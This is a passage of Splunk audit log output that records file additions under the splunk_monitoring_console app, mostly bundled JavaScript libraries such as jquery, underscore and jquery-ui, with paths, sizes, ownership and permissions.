modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.937, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/data.js", isdir=0, size=4321, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.933, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.928, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/css.js", isdir=0, size=14170, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.922, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/css", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.916, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/core.js", isdir=0, size=9179, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.913, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/core", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.909, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/callbacks.js", isdir=0, size=5552, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.905, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/attributes.js", isdir=0, size=217, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.901, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/attributes", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.897, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/ajax.js", isdir=0, size=22820, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.891, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src/ajax", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.585, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/dist/jquery.slim.min.map", isdir=0, size=110388, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.580, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/dist/jquery.slim.min.js", isdir=0, size=72397, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.576, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/dist/jquery.slim.js", isdir=0, size=234477, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.571, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/dist/jquery.min.map", isdir=0, size=137993, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.567, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/dist/jquery.min.js", isdir=0, size=89493, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.561, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/dist/jquery.js", isdir=0, size=287649, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.556, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/external/sizzle/dist/sizzle.min.map", isdir=0, size=31100, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.551, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/external/sizzle/dist/sizzle.min.js", isdir=0, size=20239, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.547, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/external/sizzle/dist/sizzle.js", isdir=0, size=70539, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.443, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/external/sizzle/dist", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.439, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/external/sizzle/LICENSE.txt", isdir=0, size=1605, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.434, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/external/sizzle", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.430, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/src", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.426, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/package.json", isdir=0, size=4101, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.422, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/external", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.417, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/dist", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.412, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/bower.json", isdir=0, size=190, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.408, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/README.md", isdir=0, size=1983, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.402, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/LICENSE.txt", isdir=0, size=1095, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.398, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery/AUTHORS.txt", isdir=0, size=12191, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.292, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/underscore/underscore.js", isdir=0, size=52919, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.288, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/underscore/underscore-min.map", isdir=0, size=27589, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.282, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/underscore/underscore-min.js", isdir=0, size=16449, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.278, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/underscore/package.json", isdir=0, size=2879, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.274, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/underscore/README.md", isdir=0, size=1225, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.270, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/underscore/LICENSE", isdir=0, size=1117, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.266, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/underscore", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.262, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/jquery", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.258, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules/d3", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.253, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/visualization.css", isdir=0, size=393, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.248, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/src", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.243, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/preview.png", isdir=0, size=15384, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.239, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/package.json", isdir=0, size=664, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.234, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/package-lock.json", isdir=0, size=711, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.230, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/node_modules", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.226, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap/formatter.html", isdir=0, size=2277, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.120, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/KpiTrafficLight/components/Tooltip.js", isdir=0, size=1014, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.116, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/KpiTrafficLight/visualization.js", isdir=0, size=5830, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.113, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/KpiTrafficLight/visualization.css", isdir=0, size=319, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.108, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/KpiTrafficLight/formatter.html", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.105, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/KpiTrafficLight/components", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.101, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/heatmap", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:03.096, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/README", isdir=0, size=453, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:03.090, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations/KpiTrafficLight", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:02.982, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/controllers/BaseManagerPageController.js", isdir=0, size=31461, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.977, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/i18n/jquery.ui.datepicker-zh-TW.js", isdir=0, size=977, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.970, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/i18n/jquery.ui.datepicker-zh-CN.js", isdir=0, size=983, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.966, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/i18n/jquery.ui.datepicker-ko.js", isdir=0, size=911, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.959, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/i18n/jquery.ui.datepicker-ja.js", isdir=0, size=902, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.955, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/i18n/jquery.ui.datepicker-it.js", isdir=0, size=912, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.950, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/i18n/jquery.ui.datepicker-fr.js", isdir=0, size=1041, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.945, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/i18n/jquery.ui.datepicker-en-GB.js", isdir=0, size=874, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.940, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/i18n/jquery.ui.datepicker-de.js", isdir=0, size=881, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.935, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/i18n/jquery-ui-i18n.js", isdir=0, size=70069, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.831, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/jquery.ui.widget.js", isdir=0, size=15085, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.826, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/jquery.ui.spinner.js", isdir=0, size=12529, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.820, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/jquery.ui.sortable.js", isdir=0, size=42714, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.814, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/jquery.ui.selectable.js", isdir=0, size=6967, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.808, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/jquery.ui.resizable.js", isdir=0, size=27692, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.804, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/jquery.ui.position.js", isdir=0, size=15845, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.799, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/jquery.ui.mouse.js", isdir=0, size=4561, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.794, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/jquery.ui.effect.js", isdir=0, size=31918, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.788, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/jquery.ui.effect-slide.js", isdir=0, size=1472, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.783, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/jquery.ui.droppable.js", isdir=0, size=11056, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.778, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/jquery.ui.draggable.js", isdir=0, size=31352, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.775, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/jquery.ui.datepicker.js", isdir=0, size=76480, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.771, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/jquery.ui.core.js", isdir=0, size=8198, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.765, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/jquery.ui.button.js", isdir=0, size=10972, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.761, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4/i18n", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:02.653, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/underscore.js", isdir=0, size=45263, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.648, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-ui-1.10.4", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:02.644, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/jquery-resize.js", isdir=0, size=9195, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.640, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib/backbone.js", isdir=0, size=60997, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.637, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/util/router_utils.js", isdir=0, size=7831, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.632, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/util/i18n.js", isdir=0, size=50863, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.628, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/util/i18n-tests.js", isdir=0, size=3687, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.624, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/util/color_utils.js", isdir=0, size=14154, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.517, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/routers/MonitoringConsoleOverviewPreferences.js", isdir=0, size=1140, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.512, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/routers/MonitoringConsoleOverview.js", isdir=0, size=17822, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.508, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/routers/MonitoringConsoleLanding.jsx", isdir=0, size=4044, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.503, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/routers/MonitoringConsoleInstances.js", isdir=0, size=4499, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.497, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/routers/MonitoringConsoleForwarderSetup.js", isdir=0, size=3399, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.492, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/routers/MonitoringConsoleConfigure.js", isdir=0, size=6006, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.488, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/routers/MonitoringConsoleCheckList.js", isdir=0, size=2324, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.484, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/routers/MonitoringConsoleCheck.js", isdir=0, size=6214, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.479, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/routers/MonitoringConsoleAlertsSetup.js", isdir=0, size=1695, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.374, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pages/monitoringconsole_overview_preferences.js", isdir=0, size=318, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.370, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pages/monitoringconsole_overview.js", isdir=0, size=274, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.366, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pages/monitoringconsole_landing.js", isdir=0, size=270, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.360, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pages/monitoringconsole_instances.js", isdir=0, size=278, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.353, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pages/monitoringconsole_forwarder_setup.js", isdir=0, size=298, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:02.344, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pages/monitoringconsole_configure.js", isdir=0, size=272, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", 